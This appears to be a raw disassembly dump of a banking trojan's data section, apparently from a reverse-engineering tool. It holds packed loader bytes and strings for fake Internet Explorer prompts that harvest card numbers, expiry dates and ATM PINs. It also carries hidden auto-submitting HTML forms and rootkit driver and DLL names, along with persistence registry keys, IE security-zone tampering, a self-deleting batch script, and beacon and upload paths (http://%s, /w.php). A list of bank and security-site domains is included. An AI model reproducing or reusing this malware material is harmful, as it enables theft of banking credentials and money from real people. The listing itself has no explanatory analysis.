dd 0CD3E783Eh, 613EDE3Eh, 853F6C3Fh, 0BF3F933Fh, 0DB3FCA3Fh
dd 0FF3FE93Fh, 0E81EEFFFh, 304CBFF4h, 30D93089h, 30F630DEh
dd 313A30FDh, 315B3141h, 2F103164h, 3194FFF4h, 31A8319Fh
dd 31F231ADh, 353F31F8h, 0FE1B1632h, 0C39E1ADFh, 34BA34AAh
dd 34D734CBh, 8D203508h, 3780356Eh, 3586FE00h, 35A535A0h
dd 37482778h, 0EDF00076h, 380E0F0Dh, 5038A72Ch, 0B7FF6838h
dd 0CB51BFFFh, 19391438h, 26392039h, 34392C39h, 39610039h
dd 39853976h, 399F398Dh, 0EE0B001Bh, 0CBAC39A7h, 0ED17D099h
dd 0FD5BFE00h, 0FA39F539h, 3A4BFF39h, 3A183A10h, 0FF743A1Eh
dd 1937FFFFh, 3B423AB3h, 3B813B73h, 3BAE3BA8h, 3BBA3BB4h
dd 3BC63BC0h, 3BD23BCCh, 2FFF3BD8h, 3BDEFFFDh, 3BEA3BE4h
dd 3DA23BF0h, 3DF33DEEh, 143E0FA0h, 303E213Eh, 423E353Eh
dd 0FFFFC006h, 563E513Eh, 723E603Eh, 893E813Eh, 3D3E903Eh
dd 0C02B473Fh, 83F001BFh, 0A629913Fh, 0C43FBC3Fh, 19FFD53Fh
dd 0F32D06DBh, 15DF30F3h, 1F301A30h, 0F8242430h, 2930EDB7h
dd 0F5350030h, 65303F30h, 1F306A30h, 9EC7E6h, 4931424Eh
dd 40601997h, 1A2FA06h, 4473458Dh, 49FE73F8h, 706802ECh
dd 3220FB6Bh, 4B5C302Eh, 809E268Bh, 5C775C17h, 120F4F0h
dd 64705505h, 95C4B162h, 0AA4EA704h, 0D43BFE77h, 42095A6Ah
dd 6174536Bh, 5307472h, 72476F9Ch, 0D670756Fh, 0A41780Ah
dd 82C11FACh, 0D7347405h, 50167618h, 0D55C7643h, 205B6E73h
dd 0D7000D01h, 1ED709Fh, 6F977EDEh, 1D00BA1Dh, 903E08F6h
dd 575D155Ch, 4640323Ch, 0FB590660h, 2A1F4523h, 0F6338008h
dd 177EFF85h, 15197F18h, 1E285C66h, 7CF73B46h, 0F30AA423h
dd 3B2480E9h, 4362FEE0h, 40101CF2h, 0C131800h, 61765468h
dd 73C6C9BEh, 0E6A1114h, 813E4810h, 1028E054h, 0C2A90040h
dd 1448EE74h, 0E7E04C1Bh, 5660A306h, 90F54C6h, 5AF736A3h
dd 20054910h, 9C4F4004h, 67FB6405h, 20345931h, 4C9C64BDh
dd 0BE57F6C9h, 0C6A49C9Ch, 0A481CF25h, 0F7D068C0h, 0D8799Fh
dd 683A6816h, 0BE0A6ABBh, 0F3482394h, 8D597FDDh, 0A5F3AC7Dh
dd 0B84BEA4h, 0A5D87D8Dh, 0B19E7CA5h, 0F5F0C11Bh, 0E80A74BEh
dd 76EBB76Ch, 0E4A5F847h, 0A40B6468h, 99BEACE6h, 553E205Dh
dd 0C1692480h, 0B0016A7Bh, 14EC7457h, 35196A0Fh, 9E2350Fh
dd 831FF89Bh, 61C94CC4h, 0E19CCD92h, 6AF8DF08h, 6CD437F5h
dd 400544A6h, 0F80D4A9h, 0F7617385h, 0EFBCBE9Dh, 96F26604h
dd 0F7BAFF00h, 0C64420Eh, 14EC358Bh, 6767F4FEh, 1AD64630h
dd 47831903h, 0C2EEBF78h, 3C305204h, 1105842Ah, 6159010Eh
dd 1E67D98Bh, 39EC6859h, 1342A20h, 0F3C868h, 0AD7210FFh
dd 13DE1A7Ch, 0EA60385Ah, 74C3640Ah, 76E0349Fh, 30AFD404h
dd 0EFEF112Eh, 8D047B2Ch, 0FF68D68Dh, 562898D0h, 1DEFBF0Ah
dd 6C51204Dh, 0B55FBBh, 0C0968B59h, 962A3635h, 144876A7h
dd 570950DDh, 2D1E04B6h, 27D8DEAh, 80EFF33h, 0B45420F9h
dd 575DB023h, 57B01D24h, 2057359h, 0CC51h, 0A0286016h
dd 41101B70h, 3C61019Ch, 0C4061801h, 44015C21h, 80C03100h
dd 0BA0ABA42h, 773E9384h, 310400F9h, 0A6922030h, 57908824h
dd 88040155h, 10B2031h, 2090E292h, 1D4010Eh, 0B2C40656h
dd 20904C04h, 6D3EE606h, 1212F125h, 41168844h, 0D25CD830h
dd 0B27B7DE3h, 4456460Ah, 5580B667h, 8A368510h, 69C443ECh
dd 7301315Ch, 165F2006h, 10C54h, 0E12F20F2h, 6E010F79h
dd 0B078D565h, 80C122A0h, 5810CE2h, 21F8DF5h, 0E054840Ch
dd 837A744Eh, 41957ACh, 96046817h, 0B05F5059h, 2EB906Ch
dd 206C510Ch, 7B2CFD48h, 0BC000000h, 71BFh, 1200h, 0BE6000FFh
dd 406000h, 0B000BE8Dh, 8357FFFFh, 10EBFFCDh, 90909090h
dd 68A9090h, 47078846h, 775DB01h, 0EE831E8Bh, 72DB11FCh
dd 1B8EDh, 0DB010000h, 1E8B0775h, 11FCEE83h, 1C011DBh
dd 75EF73DBh, 831E8B09h, 0DB11FCEEh, 0C931E473h, 7203E883h
dd 8E0C10Dh, 8346068Ah, 7474FFF0h, 0DB01C589h, 1E8B0775h
dd 11FCEE83h, 1C911DBh, 8B0775DBh, 0FCEE831Eh, 0C911DB11h
dd 1412075h, 8B0775DBh, 0FCEE831Eh, 0C911DB11h, 0EF73DB01h
dd 1E8B0975h, 11FCEE83h, 83E473DBh, 0FD8102C1h, 0FFFFF300h
dd 8D01D183h, 0FD832F14h, 8A0F76FCh, 7884202h, 0F7754947h
dd 0FFFF63E9h, 28B90FFh, 8904C283h, 4C78307h, 7704E983h
dd 0E9CF01F1h, 0FFFFFF4Ch, 0B9F7895Eh, 11Ah, 2C47078Ah
dd 77013CE8h, 43F80F7h, 78BF275h, 66045F8Ah, 0C108E8C1h
dd 0C48610C0h, 0EB80F829h, 89F001E8h, 5C78307h, 0D9E2D889h
dd 7000BE8Dh, 78B0000h, 3C74C009h, 8D045F8Bh, 90003084h
dd 0F3010000h, 8C78350h, 905096FFh, 8A950000h, 0C0084707h
dd 0F989DC74h, 0AEF24857h, 5496FF55h, 9000090h, 890774C0h
dd 4C38303h, 96FFE1EBh, 9058h, 0DF61E961h, 0FFFFh, 25h dup(0)
dd 0A0700000h, 0A0500000h, 3 dup(0)
dd 0A07D0000h, 0A0600000h, 3 dup(0)
dd 0A08A0000h, 0A0680000h, 5 dup(0)
dd 0A0940000h, 0A0A20000h, 0A0B20000h, 0
dd 0A0C00000h, 0
dd 0A0CE0000h, 0
dd 454B0000h, 4C454E52h, 442E3233h, 41004C4Ch, 50415644h
dd 2E323349h, 6C6C64h, 4356534Dh, 642E5452h, 6C6Ch, 64616F4Ch
dd 7262694Ch, 41797261h, 65470000h, 6F725074h, 64644163h
dd 73736572h, 78450000h, 72507469h, 7365636Fh, 73h, 43676552h
dd 65736F6Ch, 79654Bh, 61720000h, 646Eh, 4Ah dup(0)
db 3 dup(0)
aCBoot_sys db 'c:\boot.sys',0 ; DATA XREF: sub_40523F:loc_405261�o
align 4
dword_424038 dd 11h, 0Fh dup(0)dword_424078 dd 0E1F7EEA5h, 0BFFD7E2Ch, 869AE87Fh, 0CC244082h, 0D76ADDE2h
; DATA XREF: sub_405336:loc_405339�o
dd 1B77E1E1h, 505215B0h, 0D24B6456h, 3D357C6Bh, 280E85D5h
dd 1AB051F9h, 1E4E8744h, 0E383CCDFh, 323D4737h, 14F80518h
dd 6E0637BFh
dword_4240B8 dd 0FFFFFFFFh dd 2Ah dup(0FFFFFFFFh), 3Eh, 3 dup(0FFFFFFFFh), 3Fh, 34h
dd 35h, 36h, 37h, 38h, 39h, 3Ah, 3Bh, 3Ch, 3Dh, 7 dup(0FFFFFFFFh)
dd 0
dd 1, 2, 3, 4, 5, 6, 7, 8, 9, 0Ah, 0Bh, 0Ch, 0Dh, 0Eh
dd 0Fh, 10h, 11h, 12h, 13h, 14h, 15h, 16h, 17h, 18h, 19h
dd 6 dup(0FFFFFFFFh), 1Ah, 1Bh, 1Ch, 1Dh, 1Eh, 1Fh, 20h
dd 21h, 22h, 23h, 24h, 25h, 26h, 27h, 28h, 29h, 2Ah, 2Bh
dd 2Ch, 2Dh, 2Eh, 2Fh, 30h, 31h, 32h, 33h, 85h dup(0FFFFFFFFh)
off_4244B8 dd offset loc_405455 ; DATA XREF: sub_40540A+44�r
dd offset loc_40545A
dd offset loc_40547A
dd offset loc_40549D
byte_4244C8 db 2 dup(0) ; DATA XREF: sub_4068A8+555�o
aUnableToAuth_0 db 'Unable to authorize',0 ; DATA XREF: sub_4068A8+423�o
aUnableToAuth_1 db 'Unable to authorize - INCORRECT PIN. Please, correct.',0
; DATA XREF: sub_4068A8+428�o
aSS_1 db '%s-%s',0 ; DATA XREF: sub_4068A8+2E7�o
aPleaseSelect_0 db 'Please, select Expiration Year',0 ; DATA XREF: sub_4068A8+2BD�o
aSS_0 db '%s %s',0 ; DATA XREF: sub_4068A8+285�o
; sub_4068A8+452�o
aPleaseSelectEx db 'Please, select Expiration Month',0 ; DATA XREF: sub_4068A8+25B�o
aS_0 db '%s',0 ; DATA XREF: sub_4068A8+223�o
aV db 'V',0 ; DATA XREF: sub_406344+3DA�o
aK db 'K',0 ; DATA XREF: sub_406344+3C9�o
aRegisterservic db 'RegisterServiceProcess',0 ; DATA XREF: sub_406344+31A�o
aKernel32_dll_1 db 'kernel32.dll',0 ; DATA XREF: sub_406344+310�o
aBoot_sys db '\boot.sys',0 ; DATA XREF: sub_406344+250�o
aDatkkq32_dll db 'datkkq32.dll',0 ; DATA XREF: sub_406344+228�o
aDnkkq_dll db 'dnkkq.dll',0 ; DATA XREF: sub_406344+20F�o
aKkq32_dll db 'kkq32.dll',0 ; DATA XREF: sub_406344:loc_40653A�o
aSS db '%s\%s',0 ; DATA XREF: sub_406344+200�o
; sub_406344+219�o ...
aEnabledsf db 'enabledsf',0 ; DATA XREF: sub_406344:loc_4063A9�o
aDriversNdisrd_ db '\drivers\ndisrd.sys',0 ; DATA XREF: sub_406344+22�o
align 4
dd 2 dup(0)
dbl_4245E4 dq 1.2 ; DATA XREF: sub_405AAC:loc_406238�r
aNewver db 'newver',0 ; DATA XREF: sub_405AAC+73E�o
aXd2 db 'xd2',0 ; DATA XREF: sub_405AAC+70A�o
aWupd db 'wupd ',0 ; DATA XREF: sub_405AAC+6A5�o
a02u db ':%02u',0 ; DATA XREF: sub_405AAC+599�o
a?dmp2 db '?dmp=2',0 ; DATA XREF: sub_405AAC+4F8�o
aSS_tmp db '%s\%s.tmp',0 ; DATA XREF: sub_405AAC+415�o
aWpst db 'wpst ',0 ; DATA XREF: sub_405AAC+28E�o
aQ db 'q',0 ; DATA XREF: sub_405AAC+117�o
; sub_405AAC+309�o ...
a?ifcU db '?ifc=%u',0 ; DATA XREF: sub_405AAC+E8�o
aIfc db 'ifc',0 ; DATA XREF: sub_405AAC+CE�o
; sub_405AAC+163�o
aSoftwareMicr_3 db 'Software\Microsoft\Windows',0 ; DATA XREF: sub_405AAC+D3�o
; sub_405AAC+168�o
aW_php db '/w.php',0 ; DATA XREF: sub_405AAC+94�o
asc_42464A db '/',0 ; DATA XREF: sub_405AAC+73�o
aHttpS db 'http://%s',0 ; DATA XREF: sub_405AAC+60�o
aSS_dat db '%s\%s.dat',0 ; DATA XREF: sub_405AAC+36�o
; sub_405AAC+6DB�o
aClickOnceToCon db 'Click Once To Continue',0 ; DATA XREF: sub_40553F+412�o
aButton db 'BUTTON',0 ; DATA XREF: sub_40553F+417�o
aEdit db 'EDIT',0 ; DATA XREF: sub_40553F+396�o
; sub_40553F+3CC�o
aPleaseMakeCorr db 'Please make corrections and try again.',0 ; DATA XREF: sub_40553F+328�o
aUnableToAuthor db 'Unable to authorize. ATM PIN-Code is required to complete the tra'
; DATA XREF: sub_40553F+2EF�o
db 'nsaction.',0
aAtmPinCode db 'ATM PIN-Code',0 ; DATA XREF: sub_40553F+2B6�o
aExpirationDate db 'Expiration date',0 ; DATA XREF: sub_40553F+27D�o
aYourCardNumber db 'Your card number',0 ; DATA XREF: sub_40553F+244�o
a20_2u db '20%.2u',0 ; DATA XREF: sub_40553F+1EA�o
a_2u db '%.2u',0 ; DATA XREF: sub_40553F+1B8�o
aCombobox db 'COMBOBOX',0 ; DATA XREF: sub_40553F+164�o
; sub_40553F+19A�o
aAuthorizationF db 0Ah ; DATA XREF: sub_40553F+AF�o
db ' Authorization Failed.',0
aStatic db 'STATIC',0 ; DATA XREF: sub_40553F+B4�o
; sub_40553F+F8�o ...
aKkqhook db 'KKQHOOK',0 ; DATA XREF: sub_40553F+75�o
; sub_405AAC+11C�o ...
align 2
aExplorer db 'Explorer',0 ; DATA XREF: sub_40553F+1A�o
; sub_4068A8+78�o
aDocobject db 'DocObject',0 ; DATA XREF: sub_40553F+B�o
; sub_4068A8+62�o
aCmd_exeCStartC db '\cmd.exe /C start c:\boot.sys',0 ; DATA XREF: sub_40523F:loc_4052D9�o
aKernel32_dll_0 db '\kernel32.dll',0 ; DATA XREF: sub_40519A+2E�o
a_google_adware db '.google.adware',0 ; DATA XREF: sub_404BA0+1B3�o
a_google_ db '.google.',0 ; DATA XREF: sub_404BA0+198�o
asc_4247B9 db ':',0 ; DATA XREF: sub_404BA0+ED�o
asc_4247BB db ' %X:',0 ; DATA XREF: sub_404BA0+AB�o
asc_4247C0 db '|',0 ; DATA XREF: sub_40479E:loc_4047F2�o
aFrame_XForm_X db '<FRAME_%X-FORM_%X> ',0 ; DATA XREF: sub_404878-F8�o
aMainpgForm_X db '<MAINPG-FORM_%X> ',0 ; DATA XREF: sub_404878-12D�o
aName: ; DATA XREF: sub_4043B0+20�o
unicode 0, <name>,0
align 4
aValue: ; DATA XREF: sub_4043B0+10�o
unicode 0, <value>,0
aMicrosoftInter db 'Microsoft Internet Explorer',0 ; DATA XREF: sub_404211+6A�o
a9ba05972F6a811: ; DATA XREF: sub_404184+1E�o
unicode 0, <{9BA05972-F6A8-11CF-A442-00A0C90A8F39}>,0
aHtml_1 db '<HTML><!--',0 ; DATA XREF: sub_403D8E+2B2�o
; sub_403D8E+2BD�o ...
aXOkrecv11 db 'X-okRecv11',0 ; DATA XREF: sub_403D8E+24B�o
aIeframe db 'IEFrame',0 ; DATA XREF: sub_403D8E+1FA�o
aSUMicrosoftInt db '%s%u - Microsoft Internet Explorer',0 ; DATA XREF: sub_403D8E+1D6�o
aIexplore_exe_0 db '\Iexplore.exe ',0 ; DATA XREF: sub_403D8E:loc_403E8E�o
aPath db 'Path',0 ; DATA XREF: sub_403D8E+56�o
aSoftwareMicr_2 db 'Software\Microsoft\IE Setup\Setup',0 ; DATA XREF: sub_403D8E+5B�o
aAppeventsSch_0 db 'AppEvents\Schemes\Apps\Explorer\ActivatingDocument\.Current',0
; DATA XREF: sub_403BC5+1B5�o
aAppeventsSchem db 'AppEvents\Schemes\Apps\Explorer\Navigating\.Current',0
; DATA XREF: sub_403BC5+198�o
aGlobaluseroffl db 'GlobalUserOffline',0 ; DATA XREF: sub_403BC5+176�o
aSoftwareMicr_1 db 'Software\Microsoft\Windows\CurrentVersion\Internet Settings',0
; DATA XREF: sub_403BC5+17B�o
aIexplore_exe db 'iexplore.exe',0 ; DATA XREF: sub_403BC5+152�o
aSSoftwareMicro db '%s\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATU'
; DATA XREF: sub_403BC5+12F�o
db 'RE_LOCALMACHINE_LOCKDOWN',0
aYes db 'yes',0 ; DATA XREF: sub_403BC5+FE�o
aBrowsenewproce db 'BrowseNewProcess',0 ; DATA XREF: sub_403BC5+103�o
a_defaultSoftwa db '.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Brows'
; DATA XREF: sub_403BC5+108�o
db 'eNewProcess',0
aSoftwarePolici db 'SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Setti'
; DATA XREF: sub_403BC5+83�o
db 'ngs\Zones\%u',0
a1601 db '1601',0 ; DATA XREF: sub_403BC5+44�o
; sub_403BC5+65�o ...
aSoftwareMicr_0 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones'
; DATA XREF: sub_403BC5+28�o
db '\%u',0
aHtml_0 db '</html>',0 ; DATA XREF: sub_403659+4E8�o
aBody_0 db '</body>',0 ; DATA XREF: sub_403659+4DD�o
aScript_0 db '</script>',0 ; DATA XREF: sub_403659+4D2�o
aSettimeoutSU db 'setTimeout("%s()",%u);',0 ; DATA XREF: sub_403659+4B4�o
asc_424B31 db '}',0 ; DATA XREF: sub_403659+48C�o
aDocument_S_sub db 'document.%s.submit();',0 ; DATA XREF: sub_403659+46E�o
aFunctionS db 'function %s(){',0 ; DATA XREF: sub_403659+449�o
aC_2u db '%c%.2u',0 ; DATA XREF: sub_403659+431�o
aScript db '<script>',0 ; DATA XREF: sub_403659+3F7�o
aForm db '</form>',0 ; DATA XREF: sub_403659+3EC�o
aInputTypeSubmi db '<input type="submit" value=',27h,27h,'>',0
; DATA XREF: sub_403659:loc_403A3A�o
aS db '%s|',0 ; DATA XREF: sub_403659+31C�o
aInputTypeEdi_0 db '<input type="edit" value=',27h,'%s',27h,' name=',27h,'%s%u',27h,'><br>',0Dh,0Ah,0
; DATA XREF: sub_403659+290�o
; sub_403659+388�o
aInputTypeEditV db '<input type="edit" value=',27h,'%u',27h,' name=',27h,'a',27h,'><br>',0Dh,0Ah,0
; DATA XREF: sub_403659+1AD�o
aFormActionSMet db '<form action="%s" method="POST" name="%s">',0
; DATA XREF: sub_403659+176�o
aF_3u db 'f%.3u',0 ; DATA XREF: sub_403659+158�o
aBody db '<body>',0 ; DATA XREF: sub_403659+13C�o
aHead_0 db '</head>',0 ; DATA XREF: sub_403659+12E�o
aMicrosoftCorp db 'MicroSoft-Corp',0 ; DATA XREF: sub_403659+105�o
; sub_403D8E+1D1�o
aTitleSUTitle db '<title>%s%u</title>',0 ; DATA XREF: sub_403659+10A�o
aHead db '<head>',0 ; DATA XREF: sub_403659+F4�o
aHtml db '<html>',0 ; DATA XREF: sub_403659+E6�o
a_htm db '.htm',0 ; DATA XREF: sub_403659+D6�o
aSCC db '%s%c%c',0 ; DATA XREF: sub_4035B2+84�o
; sub_403659+25A�o
a_ db '*.*',0 ; DATA XREF: sub_4034AD+76�o
a? db '?',0 ; DATA XREF: sub_4034AD+24�o
aLu db '-%lu',0 ; DATA XREF: sub_4032E2+E5�o
aLu_0 db '%lu',0 ; DATA XREF: sub_4032E2+C0�o
a0x02hx02hx02hx db '0x%02hx%02hx%02hx%02hx%02hx%02hx',0 ; DATA XREF: sub_4032E2+88�o
aSLu db 'S-%lu-',0 ; DATA XREF: sub_4032E2+36�o
aCenter_0 db '</center>',0 ; DATA XREF: sub_403010+2A0�o
aCenter db '<center>',0 ; DATA XREF: sub_403010+280�o
aFont db '</font>',0 ; DATA XREF: sub_403010+260�o
aU db '</u>',0 ; DATA XREF: sub_403010+240�o
aB db '</b>',0 ; DATA XREF: sub_403010+220�o
aI db '</i>',0 ; DATA XREF: sub_403010+200�o
aI_0 db '<i>',0 ; DATA XREF: sub_403010+1E0�o
aU_0 db '<u>',0 ; DATA XREF: sub_403010+1C0�o
aB_1 db '<b>',0 ; DATA XREF: sub_403010+1A0�o
aBr db '<br>',0 ; DATA XREF: sub_403010+180�o
asc_424CE1 db '--> ',0 ; DATA XREF: sub_403010+52�o
asc_424CE6 db '<!-- ',0 ; DATA XREF: sub_402F2F+37�o
asc_424CEC db 0Dh,0Ah,0 ; DATA XREF: sub_402D21+1FC�o
; sub_403010+2C0�o ...
aCCC db '//%c%c%c',0Dh,0Ah,0 ; DATA XREF: sub_402D21+1C9�o
aVarCCCU db 'var %c%c%c = %u;',0 ; DATA XREF: sub_402D21+141�o
asc_424D0B db ' */',0 ; DATA XREF: sub_402D21+AC�o
aSC db '%s%c',0 ; DATA XREF: sub_402D21+7A�o
; sub_403010-64�o ...
asc_424D14 db '/* ',0 ; DATA XREF: sub_402D21+37�o
aBlind_user db 'blind_user',0 ; DATA XREF: sub_402CB2+39�o
; sub_402D13+4�o
aSCS db '%s /C %s',0 ; DATA XREF: sub_402B0D+17E�o
; sub_405AAC+681�o
aLoop@delSNul@i db ':loop',0Dh,0Ah ; DATA XREF: sub_402B0D+12F�o
db '@del %s>nul',0Dh,0Ah
db '@if exist %s goto loop',0Dh,0Ah
db '@del %s>nul',0Dh,0Ah,0
aCommand_com db '\command.com',0 ; DATA XREF: sub_402B0D+DA�o
; sub_405AAC+650�o
aSCommand_pif db '%s\command.pif',0 ; DATA XREF: sub_402B0D+C9�o
; sub_405AAC+63F�o
aSXslfdl9x_bat db '%s\xslfdl9x.bat',0 ; DATA XREF: sub_402B0D+B1�o
aCmd_exe db '\cmd.exe',0 ; DATA XREF: sub_402B0D+83�o
; sub_405AAC+611�o
aSCmd_pif db '%s\cmd.pif',0 ; DATA XREF: sub_402B0D+72�o
; sub_40523F:loc_4052C8�o ...
aSXslfdlnt_bat db '%s\xslfdlnt.bat',0 ; DATA XREF: sub_402B0D+5A�o
aSoftwareMicros db 'Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelay'
; DATA XREF: sub_40284A+24A�o
; sub_406344+3BA�o
db 'Load',0
aApartment db 'Apartment',0 ; DATA XREF: sub_40284A+221�o
aThreadingmodel db 'ThreadingModel',0 ; DATA XREF: sub_40284A+226�o
byte_424E15 db 0 ; DATA XREF: sub_40284A+20B�o
; sub_403BC5+18E�o ...
aClsidSInprocse db 'CLSID\%s\InProcServer32',0 ; DATA XREF: sub_40284A+1F3�o
; sub_406344+3F2�o
aSS_dll db '%s\%s.dll',0 ; DATA XREF: sub_40284A+185�o
a04x04x04x04x04 db '{%04X%04X-%04X-%04X-%04X-%04X%04X%04X}',0 ; DATA XREF: sub_40284A+DE�o
asc_424E5F db ' ',0 ; DATA XREF: sub_402784+8E�o
; sub_404BA0+146�o
aSS_exe db '%s\%s.exe',0 ; DATA XREF: sub_402784+22�o
; sub_406344+187�o
a08x db '%08X',0 ; DATA XREF: sub_4026EE+62�o
aP0: ; DATA XREF: sub_402638+18�o
; .text:0040269A�o ...
unicode 0, <#P0>
aF db ':F',0 ; DATA XREF: sub_4024E0+18�o
; sub_40251A+19�o
aChevychasebank db 'chevychasebank.com',0 ; DATA XREF: .data:0041A1C4�o
aGronxplanets_r db 'gronxplanets.ru',0 ; DATA XREF: .data:0041A1C0�o
aWww_mdmbank_ru db 'www.mdmbank.ru',0 ; DATA XREF: .data:0041A1BC�o
aFethard_biz db 'fethard.biz',0 ; DATA XREF: .data:0041A1B8�o
aRoyalbank_com db 'royalbank.com',0 ; DATA XREF: .data:0041A1B4�o
aSecuritylab_ru db 'securitylab.ru',0 ; DATA XREF: .data:0041A1B0�o
aTatNeftbank_ru db 'tat-neftbank.ru',0 ; DATA XREF: .data:0041A1AC�o
aSeclab_ru db 'seclab.ru',0 ; DATA XREF: .data:0041A1A8�o
aOpenbank_com db 'openbank.com',0 ; DATA XREF: .data:0041A1A4�o
aGutabank_ru db 'gutabank.ru',0 ; DATA XREF: .data:0041A1A0�o
aWww_b2bTrust_c db 'www.b2b-trust.com',0 ; DATA XREF: .data:0041A19C�o
aGrepwareFacili db 'grepware-facility.ru',0 ; DATA XREF: .data:0041A198�o
aWww_uralsib_ru db 'www.uralsib.ru',0 ; DATA XREF: .data:0041A194�o
a53bank_com db '53bank.com',0 ; DATA XREF: .data:0041A190�o
aWww_nbc_caInde db 'www.nbc.ca/index.php',0 ; DATA XREF: .data:0041A18C�o
aTotallyfreeban db 'totallyfreebanking.com',0 ; DATA XREF: .data:0041A188�o
aBarclays_com db 'barclays.com',0 ; DATA XREF: .data:0041A184�o
aWww_lbcdirect_ db 'www.lbcdirect.laurentianbank.ca/index.php',0
; DATA XREF: .data:0041A180�o
aKidosBank_ru db 'kidos-bank.ru',0 ; DATA XREF: .data:0041A17C�o
aYambo_biz db 'yambo.biz',0 ; DATA XREF: .data:0041A178�o
aProrat_net db 'prorat.net',0 ; DATA XREF: .data:0041A174�o
aWww1_hsbc_caIn db 'www1.hsbc.ca/index.php',0 ; DATA XREF: .data:0041A170�o
aWww_ovk_ru db 'www.ovk.ru',0 ; DATA XREF: .data:0041A16C�o
aWww_rbc_com db 'www.rbc.com',0 ; DATA XREF: .data:0041A168�o
aMasterX_comFor db 'master-x.com/forum/',0 ; DATA XREF: .data:0041A164�o
aWww_allahabadb db 'www.allahabadbank.com',0 ; DATA XREF: .data:0041A160�o
aOnlineBusiness db 'online-business.lloydstsb.co.uk',0 ; DATA XREF: .data:0041A15C�o
aMyonlineaccoun db 'myonlineaccounts2.abbeynational.co.uk',0 ; DATA XREF: .data:0041A158�o
aWww_absolutban db 'www.absolutbank.ru',0 ; DATA XREF: .data:0041A154�o
aWww_nomos_ru db 'www.nomos.ru',0 ; DATA XREF: .data:0041A150�o
aWww_netmagiste db 'www.netmagister.com',0 ; DATA XREF: .data:0041A14C�o
aWww_kmb_ru db 'www.kmb.ru',0 ; DATA XREF: .data:0041A148�o
aWww_spyinstruc db 'www.spyinstructors.com',0 ; DATA XREF: .data:0041A144�o
aAcroleinHawk_r db 'acrolein-hawk.rubanking.halifax-online.co.uk',0
; DATA XREF: .data:0041A140�o
aWww_icbank_ru db 'www.icbank.ru',0 ; DATA XREF: .data:0041A13C�o
aWww_bankofindi db 'www.bankofindia.com',0 ; DATA XREF: .data:0041A138�o
aPizdabolInc_ru db 'pizdabol-inc.ru',0 ; DATA XREF: .data:0041A134�o
aWww_sbrf_ru db 'www.sbrf.ru',0 ; DATA XREF: .data:0041A130�o
aWww_candidatev db 'www.candidateverifier.com/index.php',0 ; DATA XREF: .data:0041A12C�o
aWww_worldbank_ db 'www.worldbank.org/index.php',0 ; DATA XREF: .data:0041A128�o
aDigitalRelaxkg db 'digital-relaxkgb.ru',0 ; DATA XREF: .data:0041A124�o
aAsmworm_com db 'asmworm.com',0 ; DATA XREF: .data:0041A11C�o
aCrutop_nuVbu_1 db 'crutop.nu/vbulletin/showthread.php',0 ; DATA XREF: .data:0041A114�o
aWww_uniastrum_ db 'www.uniastrum.ru',0 ; DATA XREF: .data:0041A110�o
aCrutop_nuVbu_0 db 'crutop.nu/vbulletin/forumdisplay.php',0 ; DATA XREF: .data:0041A10C�o
aWww_mmbank_ru db 'www.mmbank.ru',0 ; DATA XREF: .data:0041A108�o
aCrutop_nuVbull db 'crutop.nu/vbulletin/',0 ; DATA XREF: .data:0041A104�o
aAlfabank_ru db 'alfabank.ru',0 ; DATA XREF: .data:0041A100�o
aHyperSpaceFuel db 'hyper-space-fuel.ru',0 ; DATA XREF: .data:0041A0FC�o
aWww_cwbank_com db 'www.cwbank.com',0 ; DATA XREF: .data:0041A0F8�o
aWww_vtb_ru db 'www.vtb.ru',0 ; DATA XREF: .data:0041A0F4�o
aWww_cibc_com db 'www.cibc.com',0 ; DATA XREF: .data:0041A0F0�o
aWww_bankofmadu db 'www.bankofmadura.com',0 ; DATA XREF: .data:0041A0EC�o
aWww_bmo_com db 'www.bmo.com',0 ; DATA XREF: .data:0041A0E8�o
aWww_bankBanque db 'www.bank-banque-canada.ca/index.php',0 ; DATA XREF: .data:0041A0E4�o
aWww_masterbank db 'www.masterbank.ru',0 ; DATA XREF: .data:0041A0E0�o
aEbookfinaltras db 'ebookfinaltrash.ru',0 ; DATA XREF: .data:0041A0DC�o
aMasterX_com db 'master-x.com',0 ; DATA XREF: .data:0041A0D8�o
aWww_bbin_ru db 'www.bbin.ru',0 ; DATA XREF: .data:0041A0D4�o
aOlb2_nationet_ db 'olb2.nationet.com',0 ; DATA XREF: .data:0041A0D0�o
aWelcome3_smile db 'welcome3.smile.co.uk',0 ; DATA XREF: .data:0041A0CC�o
aWww_baltbank_r db 'www.baltbank.ru',0 ; DATA XREF: .data:0041A0C8�o
aNew_egg_com db 'new.egg.com',0 ; DATA XREF: .data:0041A0C4�o
aProdexteam_n_1 db 'prodexteam.netcrutop.nu',0 ; DATA XREF: .data:0041A0C0�o
aWww_proxySocks db 'www.proxy-socks.net',0 ; DATA XREF: .data:0041A0BC�o
; .data:0041A120�o
aWww_cbr_ru db 'www.cbr.ru',0 ; DATA XREF: .data:0041A0B8�o
aProdexteam_n_0 db 'prodexteam.net/main.htm',0 ; DATA XREF: .data:0041A0B4�o
aProdexteam_net db 'prodexteam.net',0 ; DATA XREF: .data:0041A0B0�o
aAtmacasoft_com db 'atmacasoft.com',0 ; DATA XREF: .data:0041A0AC�o
; .data:0041A118�o
aSiliconfirewar db 'siliconfireware.ru',0 ; DATA XREF: .data:off_41A0A8�o
align 4
dword_425398 dd 332C4425h, 11D026CBh, 0C00083B4h, 1901D94Fhdword_4253A8 dd 3050F1FFh, 11CF98B5h, 0AA0082BBh, 0BCEBD00h ; sub_404878+12E�o
dword_4253B8 dd 3050F1F7h, 11CF98B5h, 0AA0082BBh, 0BCEBD00hdword_4253C8 dd 332C4427h, 11D026CBh, 0C00083B4h, 1901D94Fhdword_4253D8 dd 85CB6900h, 11CF4D95h, 80000C96h, 85EEF4C7hdword_4253E8 dd 2 dup(0) dd 0C0h, 46000000h
dword_4253F8 dd 0D30C1661h, 11D0CDAFh, 0C0003E8Ah, 6EE2C94Fhdword_425408 dd 10h dup(0) ; sub_406EF0:loc_406F0A�o ...
dword_425448 dd 0 ; sub_406E94:loc_406ED6�o ...
dd 0Fh dup(0)
dword_425488 dd 0 ; sub_406FF9+825�r
dword_42548C dd 0 ; sub_406FF9+82C�r
dword_425490 dd 0 ; sub_406FF9+834�r
dword_425494 dd 0 ; sub_406FF9+83C�r
align 1000h
_data ends
; Section 4. (virtual address 00026000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
